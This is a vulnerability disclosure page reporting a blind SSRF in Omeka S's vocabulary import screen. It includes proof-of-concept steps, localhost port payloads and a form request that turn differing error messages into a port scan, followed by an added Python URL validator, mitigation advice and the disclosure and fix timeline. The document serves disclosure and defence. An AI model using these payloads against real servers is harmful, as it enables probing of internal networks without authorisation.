Server Side Request Forgery (SSRF) in omeka/omeka-s

Valid

Reported on Jul 16th 2023


Description

There is Blind SSRF on the vocabulary screen in the administrator screen.

Proof of Concept

Step 1. Log in to the administrator screen and open "Import new vocabulary" from the "Vocabulary" page.
Step 2. Enter one of the following payloads in the "Vocabulary URL" field (file format: JSON-LD), submit the form, and compare the responses: the error message returned differs depending on whether the local port was open or closed.

Payload

Open port: http://localhost:80
Open port: http://localhost:443
Closed port: http://localhost:1234

Request

POST /admin/vocabulary/import HTTP/1.1
 ...

-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[url]"

http://localhost:80
-----------------------------28807843559236410972421406436
Content-Disposition: form-data; name="vocabulary-file[format]"

jsonld
-----------------------------28807843559236410972421406436
 ...

Response Result

Open port:

Unable to load the remote document "<!DOCTYPE html  ...

Closed port:

Unable to connect to localhost:1234 (Connection refused)

PoC Video

https://drive.google.com/file/d/10SmI9dtRewubES4kRHHk2xyupG_GxLF5/view?usp=sharing

Impact

It is possible to perform a port scan against the host's local environment.
Also, sensitive information in the local environment may be obtained.
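The report above shows the two ingredients of this bug: a server-side fetch of an administrator-supplied URL with no restriction on where it may point, and an error message that reveals the outcome of the connection attempt. As an added example (not code from Omeka S or from the reporter), the following validator shows the usual mitigation for the first ingredient: refuse any URL whose host is, or resolves to, a loopback, private, link-local or otherwise non-public address before the fetch happens. The hostnames, the resolution table and the `offline_resolver` are constructed so the example runs without network access; a deployment would pass `system_resolver` instead.

```python
"""
Added example (not Omeka S's own code): a guard for a server-side
"fetch this URL" feature such as the vocabulary import described above.
It rejects URLs whose host is, or resolves to, a non-public address so the
server cannot be steered into probing its own local environment.
Hostnames and the resolution table below are constructed for this example.
"""
import ipaddress
import socket
from typing import Callable, List, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolution table so the example runs offline; a real
# deployment uses system_resolver() below.
EXAMPLE_RESOLUTIONS = {
    "localhost": ["127.0.0.1", "::1"],
    "vocab.example.org": ["93.184.216.34"],              # public address (constructed)
    "mixed.example.org": ["93.184.216.34", "10.0.0.5"],  # public plus an internal address
}


def system_resolver(host: str) -> List[str]:
    """Every address the system resolver returns for host (A and AAAA records)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def offline_resolver(host: str) -> List[str]:
    """Look host up in the constructed table; unknown hosts fail to resolve."""
    if host not in EXAMPLE_RESOLUTIONS:
        raise socket.gaierror(f"constructed resolver: unknown host {host!r}")
    return EXAMPLE_RESOLUTIONS[host]


def is_public_address(ip) -> bool:
    """True only for globally routable unicast addresses. IPv4-mapped IPv6
    addresses (::ffff:a.b.c.d) are judged by the IPv4 address they carry."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_url(url: str,
                       resolver: Callable[[str], List[str]] = system_resolver
                       ) -> Tuple[bool, str]:
    """Return (ok, reason). ok is True only when the scheme is http(s), the URL
    carries no credentials, and every address the host resolves to is public.
    The resolver is injectable so the check can be exercised offline."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    # IP literals (including bracketed IPv6) are judged without a DNS lookup.
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"cannot resolve {host!r}: {exc}"
        if not addrs:
            return False, f"no addresses for {host!r}"
    # A host with any non-public address is rejected, not just one with only such addresses.
    for ip in addrs:
        if not is_public_address(ip):
            return False, f"{host!r} resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # The three payloads from the report plus a few more shapes, all judged offline.
    for candidate in ["http://localhost:80", "http://localhost:443",
                      "http://localhost:1234", "http://127.0.0.1/",
                      "http://[::1]/vocab.jsonld", "http://[::ffff:127.0.0.1]/",
                      "http://mixed.example.org/vocab.jsonld",
                      "ftp://vocab.example.org/vocab.jsonld",
                      "https://vocab.example.org/vocab.jsonld"]:
        ok, reason = validate_fetch_url(candidate, offline_resolver)
        print(f"{'ALLOW' if ok else 'REJECT':6} {candidate}  ({reason})")
```

Two caveats a practitioner will want. First, this check resolves the name once; if the HTTP client then resolves it again when connecting, a name whose answer changes between the two lookups slips through, so the fetcher should connect to the address that was validated and re-run the check on every redirect it follows. Second, the validator does nothing about the other ingredient visible under "Response Result": the import screen returns a different message for a refused connection than for a successful fetch, which is exactly what turns a blind SSRF into a port scan. Returning one generic failure message for any fetch error, without echoing connection details or remote content, removes that oracle.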

We are processing your report and will contact the omeka/omeka-s team within 24 hours. (5 months ago)
morioka12 modified the report (5 months ago)
morioka12 modified the report (5 months ago)
morioka12 modified the report (5 months ago)
We have contacted a member of the omeka/omeka-s team and are waiting to hear back (4 months ago)
omeka/omeka-s maintainer has acknowledged this report (4 months ago)
morioka12 (Researcher), 4 months ago:

Thank you for reviewing and approving my report. I will continue to wait for requests for fixes and CVEs.

John Flatness validated this vulnerability (4 months ago)
morioka12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
morioka12 (Researcher), 4 months ago:

@zerocrates Thanks for the fix and pull merge. Could you please submit a corrected mark and CVE assignment request?

John Flatness marked this as fixed in 4.0.2 with commit dc01ca (4 months ago)
The fix bounty has been dropped
This vulnerability has been assigned a CVE
John Flatness published this vulnerability (4 months ago)